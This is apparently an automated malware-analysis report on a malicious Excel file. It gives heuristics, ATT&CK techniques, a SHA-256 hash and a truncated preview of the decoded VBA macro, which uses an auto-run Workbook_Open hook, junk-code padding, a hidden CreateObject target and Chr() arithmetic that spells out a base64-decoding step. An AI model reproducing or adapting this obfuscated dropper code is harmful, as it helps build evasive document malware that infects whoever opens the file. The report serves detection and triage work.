Verdict: MALICIOUS
Risk Score: 202
MITRE ATT&CK: T1059.005 Visual Basic; T1566.001 Spearphishing Attachment
Malware Insights
The file contains VBA macros, specifically a Workbook_Open event, which is a common technique for initial execution. The macro code is heavily obfuscated, including reassembling API names from split string literals, indicating malicious intent. The primary goal appears to be downloading and executing a secondary payload, though the specific URL or mechanism is not directly extractable from the provided obfuscated code.
Heuristics (6)
- VBA macros detected (medium; 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- Workbook_Open macro (high) OLE_VBA_WBOPEN: Workbook_Open macro.
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call.
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11768 bytes |

SHA-256: 7e782dbff70003b921fd5f077f6d1586ec6c835c035d8b0533ab43cfbcf4abe7
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 5 long base64-like blobs).

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
x1RbJPD.YqYK8SL91e4PUszuZpw_
While 20 = 37
Dim spUxIM_V18d9EN As Boolean
Wend
Dim FRej7kjH4m As Worksheet
While 1 = 46
Dim qpJaJjjur5sU As Boolean
Wend
Dim kAtNzG3A4IFzsb4 As Worksheet
While 9 = 31
Dim EybHfZJbg35 As Boolean
Wend
Dim oW4LWSHuqczru As Worksheet
While 4 = 54
Dim bO3rfhTrqod As Boolean
Wend
Dim NvL4YhKU4adF As Worksheet
While 23 = 40
Dim quwp7uZOFpoO As Boolean
Wend
Dim ga58gK8rXPHf5 As Worksheet
While 6 = 42
Dim P4mUz_uvAtumu6M As Boolean
Wend
Dim MxhE7V7mMwrcvq As Worksheet
While 18 = 36
Dim YlOuEcektzncuZ As Boolean
Wend
Dim IL3ZAcIaiZ As Worksheet
While 26 = 48
Dim dSPYgGf9Dj As Boolean
Wend
Dim Fd2nbqlCrZbjf As Worksheet
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "x1RbJPD"
Dim feevJpISxli8fi7xic_RJmnZijSGj39E7mYfMx_dG8L8FMueRqLsxOw3zDKiUAs5lc_2HZiuXdIKYpSTywx3oOPqzfoIkdGENQUmL2V2FZTS_jcIt1thLyNVKQBltY As String
Dim FYKPlFDbMNrx7UDedMMqSfUDqJlL7q_JxWJSS2sgaKsamQD79AJbMumiDFiZdzeeIg_hItKkcpOGw3ZYEoM5fl7BtjOKRRBjpLQEPevMyh As String
Dim hKdyKXw9AlZSJQCYSICEuAgiZCI6ACRVXFhKoFM5tPBN3FFAbh_ViCRfn4XHNz88SC5CsztL6FUc9QoR5GcaC5wTwBgtq_p4RD5zJDQlwvZaqyfUNEMEUe5WOj As String
Dim e8iJzRqVYwh1CwGL8C6rNRGg1oe8EXFuTIJiB3wvT5BkQHOIucZM6vnLyBRJvsPAowe3lhIDOIVROeNrYULk73xgd7t_jl9knA6clUgLSV8uYT6Rvj As Integer
Function b_4PbQf8BywkINKLqGdpyCrAugugW19d3vxXmzDpglDn_CRbYz_R84pYQ2e(kbn_yCU7lAVESmxBnj3M_cCawL6PdWumQVQsfIVnfo7qVEARCgopab)
While 24 = 36
Dim klqpS_7akTA As Boolean
Wend
Dim fKNBI4p1PH1 As Worksheet
While 8 = 40
Dim DNbyfoYc9C7MDI1 As Boolean
Wend
Dim fpXKTgMDxC7_ As Worksheet
Dim Vg8NhrkJCb9ajMM2ORKviC_nN8YOkmX_ccPW5oyIZ7Vi7SJR6kGdONXRgS_iRThXC48F7y6ibBTkpYp5wES_e3xND7zkoO1EX7eCUDUEngAM3wlGlDvKAh3I_rB99T3LJNLr3lirtLT72jTPTq8
While 22 = 53
Dim f2WELzshbMd As Boolean
Wend
Dim cQBGT8i7J1QV9aD As Worksheet
While 20 = 30
Dim xRyImvhi2kk6sV As Boolean
Wend
Dim SkXQK44RY2EN_ As Worksheet
Dim iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB
While 14 = 35
Dim vLNdWmGBZrQjq5q As Boolean
Wend
Dim HesAyizN2DwgId As Worksheet
While 2 = 45
Dim CWpvUlELRkT33Fq As Boolean
Wend
Dim c9KI3G_Yd58VY As Worksheet
While 7 = 41
Dim jE8ffuMK_HTe As Boolean
Wend
Dim YfqMN7UtVR As Worksheet
While 12 = 30
Dim g7T_x88KzW As Boolean
Wend
Dim OokLlwUG2ebz1m As Worksheet
Set iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB = CreateObject(FYKPlFDbMNrx7UDedMMqSfUDqJlL7q_JxWJSS2sgaKsamQD79AJbMumiDFiZdzeeIg_hItKkcpOGw3ZYEoM5fl7BtjOKRRBjpLQEPevMyh)
While 2 = 37
Dim bkWJN7klCPg As Boolean
Wend
Dim AJf6OLxQ7Ot As Worksheet
While 22 = 41
Dim djakL11zqEqf As Boolean
Wend
Dim Liv63umkTokkyJk As Worksheet
feevJpISxli8fi7xic_RJmnZijSGj39E7mYfMx_dG8L8FMueRqLsxOw3zDKiUAs5lc_2HZiuXdIKYpSTywx3oOPqzfoIkdGENQUmL2V2FZTS_jcIt1thLyNVKQBltY = Chr(339 - 241) & Chr(143 - 38) & Chr(368 - 258) & Chr(322 - 276) & Chr(344 - 246) & Chr(483 - 386) & Chr(257 - 142) & Chr(329 - 228) & Chr(264 - 210) & Chr(100 - 48)
While 25 = 38
Dim Qmg3Wrp2jw As Boolean
Wend
Dim UWtKYy4c9soZ1X As Worksheet
While 20 = 31
Dim JlGiy9yuANhK As Boolean
Wend
Dim IKRweqKHfV2Y4 As Worksheet
Set Vg8NhrkJCb9ajMM2ORKviC_nN8YOkmX_ccPW5oyIZ7Vi7SJR6kGdONXRgS_iRThXC48F7y6ibBTkpYp5wES_e3xND7zkoO1EX7eCUDUEngAM3wlGlDvKAh3I_rB99T3LJNLr3lirtLT72jTPTq8 = iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB.createElement("I4VC7GToF7Z5uN")
While 28 = 51
Dim ypFya6zvHqujFC As Boolean
Wend
Dim k8iVdlMnrIKL As Worksheet
While 11 = 33
Dim Nr1xsrn9Qq6 As Boolean
Wend
Dim iRqY_d
... (truncated)